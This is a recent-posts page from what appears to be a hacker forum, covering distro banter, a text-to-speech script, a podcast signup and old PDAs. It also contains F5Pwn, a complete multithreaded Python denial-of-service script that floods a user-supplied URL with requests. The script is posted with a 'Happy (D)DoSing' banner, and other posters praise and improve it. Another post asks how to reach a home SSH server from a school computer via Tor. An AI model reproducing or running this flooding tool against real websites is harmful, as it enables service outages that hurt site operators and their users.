Recent Posts

Pages: 1 2 [3] 4 5 ... 10
21
eBooks / Re: BT5 cookbook
« Last post by Firo on Yesterday at 08:38:53 am »

Its some crap ubuntu spinoff with a couple packages and a cute wallpaper.


At least Kali isn't built on one of the worst kernels known to man :P


Dragons are k00l
22
This is just one of the many reasons we hate Microsoft. They have absolutely no respect for other peoples privacy. I say, sue 'em
23
Scripting languages / AI with python
« Last post by pyte on Yesterday at 07:45:57 am »
Ive been quite lost for the past months but here i am again .
i have a short code ive just written with an intention to have a conversation with my script.
i got the part where my script gets to speak but never the part to listen and respond accordingly.
Any advice on what to do from here(using Linux)
here is the script.


Code: [Select]
import subprocess
import time
import threading
def Talk():
      threading.Timer(10,Talk).start()
text = '"hi there "'
subprocess.call('espeak '+text, shell=True )
       
24
Code Library / Re: [Python] F5 Rape
« Last post by 3vilp4wn on Yesterday at 05:46:56 am »
Not bad. Using urlopen, some threading and a little flashier effects.
Thanks.

Also, incrementing by repeating the variable and adding one is redundant. That's why you have the += operator.
True, but I wasn't thinking about that when I was programming it  :P
25
Code Library / Re: [Python] F5 Rape
« Last post by vezzy on Yesterday at 05:31:17 am »
Not bad. Using urlopen, some threading and a little flashier effects.

Also, incrementing by repeating the variable and adding one is redundant. That's why you have the += operator.

26
Code Library / Re: [Python] F5 Rape
« Last post by 3vilp4wn on Yesterday at 05:21:44 am »
Here's my attempt at making it better: F5Pwn!
I made it faster and multithreaded.

Code: [Select]
import thread
import urllib2
import sys
import time

def usage():
    print 'Usage: python ' + sys.argv[0] + ' <url> <threads>'
    sys.exit()

def reloader(numthread):
    url = sys.argv[1]
    numreloads = 0
    while True:
        try:
            urllib2.urlopen(url)
            numreloads = numreloads + 1
        except KeyboardInterrupt:
            sys.exit('\nProcess aborted.')

def splash():
    print '''
+-------+
| F5Pwn |
+-------+--------------------+
|  ___ ___ ___      3vilp4wn |
| | __| __| _ \__ __ ___ _   |
| | _||__ \  _/\ V  V / ' \  |
| |_| |___/_|   \_/\_/|_||_| |
+ ---------------------------+
| Made by 3vilp4wn, based on |
|    F5 Rape by vezzy.  A    |
|    simple DoSer maed in    |
|    python with urllib2.    |
+----------------------------+
| Happy (D)DoSing, you skid! |
+----------------------------+
'''

if len(sys.argv) < 3:
    usage()

if __name__ == '__main__':
    splash()
    print '[!] DoSing ' + sys.argv[1] + ' with ' + sys.argv[2] + ' threads.'
    for reloadspawn in range(0, int(sys.argv[2])):
        thread.start_new_thread(reloader, (reloadspawn,))
    sys.stdout.write('')
    dosind = ['-', '\\', '|', '/']
    dosstat = 0
    while True:
        try:
            sys.stdout.write('\r' + dosind[dosstat % 4] + ' DoSing...')
            sys.stdout.flush()
            dosstat = dosstat + 1
            time.sleep(0.25)
        except KeyboardInterrupt:
            sys.exit('\nProcess aborted.')
27
General discussion / Official "Put me on the Podcast" thread
« Last post by taters on Yesterday at 04:04:00 am »
You know. Official. To separate this from the MASSES of threads that are unofficial. Because those happen. Epidemic.


Anyway. For those of you who are just chomping at the bit to get on the show, I present this thread. It's a nice thread, don't you think? Got it for a bargain too.


If you're interested on being on the show, shout it here. I'm working on setting up some sort of calendar of events for the main site, and if I ever get off my ass and actually do more than just say "I'm working on a calendar of events", I can start scheduling guests there.


We're looking for people who are interesting, humorous, and bring something to the table. If you're planning on getting on here and talking about how weed is the root of everything good and how awesome your shit is, you will be left in the deleted bucket with the rest of the bullshit that goes on pre, post, and during, the show.


Also, if you've done something awesome recently, made news, got raided, got raided and were found jacking off over your sister's bed, etc, we'd like to interview you. We can be flexible with the scheduling of those, I'll just cut them into the show at some point.
28
Found it on the Webs / Re: Psion Mobile Computers
« Last post by Corrupted_Fear on Yesterday at 03:31:55 am »
I give you another piece of older technology that if updated today would be my tool of choice. Found it while going through some old warehouse stuff. I present you the Sony Clie' ux50:


http://www.geek.com/hwswrev/pda/ux50/


picture:
http://www.palminfocenter.com/images/img_sony_ux50_1_sm.jpg


The specs aren't that impressive at all compared to modern standards, but if the software was updated with modern hardware components, I would most certainly want this in my arsenal...
29
Security Tools / best ssh browser terminal
« Last post by trexd___ on Yesterday at 02:12:29 am »
hello im based on a school computer with no admin but i am using tor and would like to know what the best web browser based terminal for logging into my ssh server at home
30
eBooks / Re: Ebook Library V2.0.0.2.897q
« Last post by taters on Yesterday at 02:03:41 am »
Sorry about that. I had a power outage that fucked everything up. Still finding things that aren't working
Pages: 1 2 [3] 4 5 ... 10


Intern0t SoldierX py1337 SecurityOverride programisiai iExploit
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.